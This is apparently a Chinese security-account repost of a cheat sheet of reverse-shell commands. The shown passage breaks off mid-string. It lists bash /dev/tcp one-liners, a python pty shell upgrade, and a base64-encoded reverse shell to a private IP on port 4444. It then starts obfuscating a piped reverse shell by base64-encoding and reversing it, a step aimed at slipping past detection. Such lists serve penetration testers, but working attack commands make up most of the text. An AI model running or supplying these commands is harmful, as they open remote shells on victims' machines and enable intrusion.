朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把“亿人安全“设为星标”,否则可能就看不到了啦原文链接:https://xz.aliyun.com/t/14240文章旨意在于总结各类反弹shell,有不足或漏缺请各位是否指出.注意有些反弹shell的方法或脚本只适用于Linux或者Windows,注意区分相关脚本的编写方式方法。bashbash -i >& /dev/[tcp|udp]/[host]/[port] 0>&1/bin/bash -i > /dev/[tcp/udp]/[host]/[port] 0&1 2>&1python3 -c 'import pty;pty.spawn("/bin/bash")' stty rawbase64版bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC43LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}' //其中的base64字符是bash -i >& /dev/tcp/10.10.14.7/4444 0>&1的base64加密还可以引申一波基础的反弹指令echo "bash -i >& /dev/tcp/192.168.43.47/4444 0>&1" | bash我们来给它混淆一下先给它base64一下ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjQ3LzQ0NDQgMD4mMSIgfCBiYXNo然后反转一下oNXYiBCfgISMm4D
………………………………